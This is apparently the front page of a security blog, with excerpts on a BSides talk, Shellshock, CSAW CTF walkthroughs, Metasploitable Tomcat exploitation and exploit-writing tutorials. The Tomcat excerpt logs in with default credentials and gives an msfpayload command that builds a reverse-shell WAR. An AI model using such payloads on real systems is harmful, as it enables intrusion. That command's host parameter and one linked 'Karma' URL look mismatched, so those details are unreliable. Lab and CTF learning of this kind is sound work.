Bsides 2015 Talk

This is my talk from Bsides Boston 2015. I feel overall the talk went well even though I did not have my presenters notes due to a projector issue.

I have removed the demo videos from the slides to save on space. But you can see them below as well as download the powerpoint file.

Tools I used:

-Decrypt.ps1 (For decrypting the Windows GPO entry)
-Karma/Mana/NetHunter
–https://github.com/karma-runner/karma
–https://github.com/sensepost/mana
–http://www.nethunter.com/
-Frogger
–https://github.com/nccgroup/vlan-hopping
-Responder
–https://github.com/SpiderLabs/Responder

Resources:

http://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
http://en.wikipedia.org/wiki/VLAN_hopping

You can watch my talk below.

Shellshock demo set-up and POC

I’m not sure if everyone has been made aware of this, but a BASH vulnerability has been discovered… /sarcasm

OK, seriously, as everyone has heard by now, “Shellshock” is the new hot topic right now. Since I am one who learns by doing, I decided to give it a go, and see exactly how it works. My first instinct was to see how it works against the SSH protocol (CGI write up is coming soon). Now that I see what it actually is, I see that it would take an extraordinary set of circumstances for it to be a viable method of gaining entry (at least through SSH), but should those circumstances be present in your environment, it could be devastating (So make sure you patch everything up!).

CSAW 2014 walkthrough – Fluffy No More

Fluffy No More was a Forensics 300 point challenge at CSAW 2014. The backstory seemed kind of funny and I thought I’d give it a shot!

fluffy no more challenge

Setup

The attached tarball contained a few additional tarballs:

  • Full /etc directory contents
  • Full /var/log directory contents
  • Full /var/www directory contents
  • A MySQL database dump file

The task was to determine the attacker’s ingress point as well as discover a key for the CTF challenge. I cover both points in the sections below.

CSAW 2014 walkthrough – pybabbies

pybabbies was an Exploitation 200 challenge during the CTF and I got “voluntold” to work on this one by my team mates since I have a strong Python background. The night was young and I felt pretty good about it, so I took a look.

pybabbies challenge

Setting the scene

Connecting to that IP/port with netcat revealed a shell prompt indicating that I had connected to a Python sandbox environment. Python sandboxes are nothing new, and I had actually recently done some reading on a sandbox challenge from an older CTF writeup so I felt pretty good about what I was getting myself in to.

Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Lets start with a Nmap scan…

1409539753_thumb.png
So we can see on port 8180 we have Tomcat running…  Lets take a look at it…

As we can see the Tomcat manager requires a login.  I know that by default the username and password is ‘tomcat’ lets try that.

we have logged into the manager application!  Lets now take a look at generating a reverse shell!

msfpayload linux/x86/shell_reverse_tcp RHOST=172.16.28.245 LPORT=4444 W > myshell.war

Enumerator PIP install is live

Great news! After collaborating with felux(@sugarstackio) of http://sugarstack.io  in #overflowsec. Im excited that enumerator is now a pip install within python! Woohoo!

More information can be obtained at Enumerator PIP. Give it a once over, its an easy install now.

Thanks felux for all of the hard work, the project is coming along great. Look for more updates in the future.

Simple Buffer Overflow bypassing SEH

Here recently, I have gotten more interested in exploit writing, and the entire process of it. Being that I am noob to this, I obviously started my quest by looking for tutorials. Unfortunately I wasn’t able to find the “Explain like I’m 5” tutorial that I needed, and the entire process took me much longer than anticipated. Now that I finally got it figured out, I wanted to share with the world! 😀

Home Depot Data Breach

Details are still not clear, but at this point we do suspect there has been a large data breach at The Home Depot.  There is no reason to believe only some stores were effected, and chances are the breach is spread across the companies 2,000+ stores.

Banks are saying they have seen “suspicious” activity so far dating back to April of 2014.  If that is the case, we need to think of the impact this could have.  If you remember back, Target had only been breached for 2-3 weeks and leaked some 40 million credit and debt cards.

New Video Series

We are excited to announce we have started production on our first video series!  “Metasploitable without Metasploit”  The focus of this video series it to teach the up and coming InfoSec student how to manually exploit Metasploitable.  This is going to help you get a much better understanding as to why these exploits work, and what makes them tick.

Don’t get us wrong we love Metasploit, but we also feel it is important to have a solid foundation in exploitation the manual way.  This video series was inspired by taking the OSCP course, which has very strict guidelines for when and what you can do with Metasploit.

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members employers.